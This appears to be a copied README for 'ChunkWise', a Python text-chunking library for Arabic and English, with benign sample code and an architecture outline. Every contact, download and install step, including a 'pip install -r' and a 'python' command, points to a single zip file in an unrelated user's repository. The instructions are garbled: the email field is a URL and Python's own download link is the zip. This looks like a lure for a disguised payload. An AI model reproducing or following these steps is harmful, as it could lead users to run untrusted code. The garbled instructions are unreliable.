ChunkWise is a Python library for chunking Arabic and English text. It offers 31 chunking strategies across 7 categories, which suits natural language processing and document-handling work such as language-model pipelines and document analysis.
Hesham Haroon
For support, questions, or commercial licensing inquiries:
- Email: https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
- GitHub: @h9-tec
- 31 Chunking Strategies across 7 categories
- Arabic Language Support: Handles diacritics and normalization
- English Language Support: Provides sentence detection
- Automatic Language Detection
- Embedding-Based Chunking: Requires sentence-transformers
- LLM-Based Chunking: Requires OpenAI/Anthropic API
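To make the Arabic normalization and language detection features more concrete, here is a minimal standard-library sketch. It is not ChunkWise's own API: `normalize_arabic` and `detect_language` are hypothetical helper names, and the script-counting heuristic is an assumption about how detection could work, not a description of the library's implementation.

```python
import re

# Arabic diacritics (tashkeel, U+064B..U+0652), superscript alef (U+0670)
# and tatweel (U+0640). These are commonly stripped before chunking.
_DIACRITICS = re.compile("[\u064B-\u0652\u0670\u0640]")

# Alef with madda, hamza above, and hamza below are mapped to bare alef.
_ALEF_VARIANTS = re.compile("[\u0622\u0623\u0625]")


def normalize_arabic(text):
    """Strip diacritics and tatweel, then unify alef variants (hypothetical helper)."""
    text = _DIACRITICS.sub("", text)
    return _ALEF_VARIANTS.sub("\u0627", text)


def detect_language(text):
    """Return 'ar' or 'en' by comparing Arabic-block and Latin letter counts.

    Assumption: only these two languages are expected. Ties and empty
    input fall back to 'en'.
    """
    arabic = sum(1 for ch in text if "\u0600" <= ch <= "\u06FF")
    latin = sum(1 for ch in text if "a" <= ch.lower() <= "z")
    return "ar" if arabic > latin else "en"
```

A caller would typically run `detect_language` first and apply `normalize_arabic` only when the result is `"ar"`.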
Follow these simple steps to download and use ChunkWise:
- Visit the Releases Page
  Click the link below to go to the download page.
  Visit this page to download ChunkWise
- Choose Your Version
  On the Releases page, you will see various versions of ChunkWise. Look for the latest stable release.
- Download the File
  Click on the version you want and download the appropriate file for your system. The file might be in zip or tar format.
- Extract the Files
  Once the download is complete, locate the file on your computer. If it is a zip file, right-click it and choose "Extract All", then follow the prompts to extract the files to a folder of your choice.
- Install Required Packages
  To run ChunkWise, you need Python installed on your computer. If you don't have it, download it from https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip and install it. Then open your command prompt or terminal and run the following command to install any required packages:
  pip install -r https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
- Run ChunkWise
  After installation, navigate in your command prompt or terminal to the folder where you extracted ChunkWise. Use the following command to run the application:
  python https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
You can download ChunkWise by visiting the following link:
Make sure to follow the steps listed in the "Getting Started" section for a smooth installation process.
ChunkWise is structured to be easily extendable and maintainable. Below is a simple overview of its architecture:
graph TB
subgraph "ChunkWise Library"
A[Chunker] --> B[BaseChunker]
B --> C[Strategies]
B --> D[Language Support]
B --> E[Tokenizers]
subgraph "Strategies"
C --> C1[BasicChunking]
C --> C2[AdvancedChunking]
C --> C3[SemanticChunking]
end
end
This structure makes it easy to add new chunking strategies and to update language support and tokenizers without changing the top-level Chunker.
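The layering in the diagram can be sketched roughly as follows. This is an illustrative sketch under stated assumptions, not the library's actual code: the class names `CharacterChunker` and `SentenceChunker`, the `STRATEGIES` registry, and the `chunk_size` parameter are all hypothetical. Only `Chunker` and `BaseChunker` appear in the diagram.

```python
import re
from abc import ABC, abstractmethod


class BaseChunker(ABC):
    """Common interface that every strategy implements."""

    def __init__(self, chunk_size=100):
        if chunk_size <= 0:
            raise ValueError("chunk_size must be positive")
        self.chunk_size = chunk_size

    @abstractmethod
    def chunk(self, text):
        """Return a list of string chunks."""


class CharacterChunker(BaseChunker):
    """Basic strategy: fixed-size character windows."""

    def chunk(self, text):
        size = self.chunk_size
        return [text[i:i + size] for i in range(0, len(text), size)]


class SentenceChunker(BaseChunker):
    """Groups whole sentences until chunk_size characters would be exceeded."""

    # Split after '.', '!', '?' or the Arabic question mark (U+061F).
    _BOUNDARY = re.compile(r"(?<=[.!?\u061F])\s+")

    def chunk(self, text):
        sentences = [s for s in self._BOUNDARY.split(text.strip()) if s]
        chunks, current = [], ""
        for sentence in sentences:
            candidate = f"{current} {sentence}" if current else sentence
            if current and len(candidate) > self.chunk_size:
                chunks.append(current)  # close the chunk that is already full
                current = sentence
            else:
                current = candidate
        if current:
            chunks.append(current)
        return chunks


# Hypothetical registry: adding a strategy means adding one entry here.
STRATEGIES = {"character": CharacterChunker, "sentence": SentenceChunker}


class Chunker:
    """Facade that selects a strategy by name and delegates to it."""

    def __init__(self, strategy="sentence", **kwargs):
        if strategy not in STRATEGIES:
            raise ValueError(f"unknown strategy: {strategy!r}")
        self._impl = STRATEGIES[strategy](**kwargs)

    def chunk(self, text):
        return self._impl.chunk(text)
```

With this layout, `Chunker("sentence", chunk_size=200).chunk(text)` and `Chunker("character", chunk_size=200).chunk(text)` share one entry point, and a new strategy only needs to subclass `BaseChunker` and be registered.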
If you encounter issues or have suggestions, feel free to reach out via the contact information provided earlier. We welcome contributions from the community. To contribute:
- Fork the repository.
- Create a new branch for your feature.
- Make your changes and commit them.
- Submit a pull request with a clear explanation of your changes.
ChunkWise is compatible with:
- Operating Systems: Windows, macOS, and Linux
- Python Version: 3.6 or higher
- Memory: At least 512 MB available
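The requirements above can be checked before installing with a short script like the one below. It is a sketch, not part of ChunkWise: `check_environment` is a hypothetical helper, and the memory requirement is left out because the standard library has no portable way to query available memory.

```python
import platform
import sys

MIN_PYTHON = (3, 6)
# platform.system() reports macOS as "Darwin".
SUPPORTED_SYSTEMS = {"Windows", "Darwin", "Linux"}


def check_environment(version=None, system=None):
    """Return a list of problems; an empty list means the checks passed.

    Both arguments default to the running interpreter and OS, and can be
    overridden to test other combinations.
    """
    version = tuple(sys.version_info[:2]) if version is None else tuple(version[:2])
    system = platform.system() if system is None else system

    problems = []
    if version < MIN_PYTHON:
        problems.append(
            f"Python {MIN_PYTHON[0]}.{MIN_PYTHON[1]} or higher is required, "
            f"found {version[0]}.{version[1]}"
        )
    if system not in SUPPORTED_SYSTEMS:
        problems.append(f"unsupported operating system: {system}")
    return problems


if __name__ == "__main__":
    for problem in check_environment():
        print(problem)
```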
ChunkWise is open-source software. You can freely use and modify it under the terms of the MIT License. Full details can be found in the LICENSE file included with the software.
ChunkWise offers a range of features for effective text chunking in Arabic and English. By following the steps above, you can easily download, install, and start using the library for your text processing needs.